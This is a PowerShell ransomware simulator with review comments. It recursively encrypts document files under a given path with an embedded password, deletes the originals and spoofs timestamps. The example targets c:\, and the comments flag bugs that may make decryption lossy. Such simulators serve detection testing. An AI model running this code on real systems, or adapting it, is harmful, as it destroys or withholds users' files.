Invoke-RansomSIM.ps1
<#
.SYNOPSIS
Ransomware simulator that encrypts or decrypts a folder of files with specific popular document extensions, using an embedded password (the password is embedded to avoid abuse of the script)
The script is based mostly on the implementation of Invoke-AESEncryption.ps1 from https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1
.DESCRIPTION
Takes a Folder and encrypts or decrypts it with AES256 (CBC)
.PARAMETER Mode
Encryption or Decryption Mode
.PARAMETER Path
Filepath for folder to encrypt or decrypt
.EXAMPLE
Invoke-RansomSIM -Mode Encrypt -Path c:\
Description
-----------
Encrypts all document files on disk c:\
#>
function Invoke-RansomSIM {
# Walks $Path recursively and, depending on $Mode, either replaces matching
# document files with AES-CBC encrypted "<name>.cryptest" copies or turns
# "*.cryptest" files back into files without that suffix. Originals are deleted
# in both directions, so this is a destructive operation on whatever $Path holds.
# Observable behaviour for detection testing (all visible below): recursive
# enumeration, whole-file read, write of a new file with a fixed extra extension,
# deletion of the source file, and LastWriteTime copied onto the new file.
[CmdletBinding()]
# NOTE(review): OutputType declares [string], but the body only calls Write-Host /
# Write-Error; nothing is written to the pipeline in the visible code.
[OutputType([string])]
Param
(
[Parameter(Mandatory = $true)]
[ValidateSet('Encrypt', 'Decrypt')]
[String]$Mode,
# NOTE(review): $Path carries two Parameter attributes; the second names a
# parameter set "CryptFile" that no other parameter here uses. Presumably a
# leftover from the Invoke-AESEncryption script this is based on; confirm.
[Parameter(Mandatory = $true)]
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path
)
Begin {
# One SHA-256 and one AES object are created here and shared by every file
# processed in the Process block.
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
# Zero padding: the plaintext length is not stored anywhere in the output, so a
# decrypted file may come back with trailing zero bytes rather than
# byte-identical to the original (TODO confirm on the target runtime).
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
# Fixed, embedded password (deliberate, per the help text above the function).
$Key = "mortest"
# Extensions selected in Encrypt mode; -match is case-insensitive in PowerShell.
$ExtRegex = '\.(doc|pdf|docx|xls|xlsx|pptx|ppt)$'
}
Process {
# The AES key is a single SHA-256 of the UTF-8 password bytes (no salt or
# iteration count is applied in the visible code). CBC is used without any
# integrity tag, so Decrypt cannot tell a tampered or foreign file from a valid one.
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))
switch ($Mode) {
'Encrypt' {
# Collect full paths of all non-directory items under $Path whose extension
# matches $ExtRegex, then process them one at a time.
Foreach($filepath in @(gci $Path -Recurse -Attributes !Directory | Where-Object{$_.Extension -match $ExtRegex} | %{$_.FullName}))
{
$File = Get-Item -Path $filepath -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
# break leaves the foreach: remaining files are not processed.
break
}
# Whole file is read into memory and encrypted in a single call.
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".cryptest"
$encryptor = $aesManaged.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
# Output layout: 16-byte IV followed by the ciphertext. No GenerateIV call is
# visible, so the IV is whatever the shared AES object currently holds.
$encryptedBytes = $aesManaged.IV + $encryptedBytes
# NOTE(review): this disposes the shared AES object created in Begin while the
# loop goes on to use it for the next file. What later iterations do (throw, or
# run with key material other than the one set above) depends on the .NET
# runtime and is not established by this file; confirm before relying on
# Decrypt to restore more than the first file. Run only against disposable copies.
$aesManaged.Dispose()
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
# Copies the original modification time onto the encrypted file, so the
# new file's LastWriteTime does not reflect when it was written.
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
# The original is deleted with no check that the written file can be decrypted.
Remove-Item $filepath
Write-Host "File encrypted to $outPath"
}
}
'Decrypt' {
# Same enumeration as Encrypt, but selecting files with the .cryptest extension.
Foreach($filepath in @(gci $Path -Recurse -Attributes !Directory | Where-Object{$_.Extension -match '\.(cryptest)$'} | %{$_.FullName}))
{
$File = Get-Item -Path $filepath -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
# break leaves the foreach: remaining files are not processed.
break
}
$cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
# NOTE(review): -replace takes a regex; ".cryptest" is unanchored and its "."
# matches any character, so every such match in the full path is removed,
# not only the trailing extension.
$outPath = $File.FullName -replace ".cryptest"
# First 16 bytes are taken as the IV; there is no check that the file is at
# least 16 bytes long or that it was produced by this script.
$aesManaged.IV = $cipherBytes[0..15]
$decryptor = $aesManaged.CreateDecryptor()
$decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
# NOTE(review): same in-loop Dispose of the shared AES object as in Encrypt;
# behaviour for the second and later files needs confirming on the target runtime.
$aesManaged.Dispose()
[System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
# The .cryptest file is deleted with no check that the output is intact.
Remove-Item $filepath
Write-Host "File decrypted to $outPath"
}
}
}
}
End {
# Final cleanup of both crypto objects ($aesManaged may already have been
# disposed inside the loops above).
$shaManaged.Dispose()
$aesManaged.Dispose()
}
}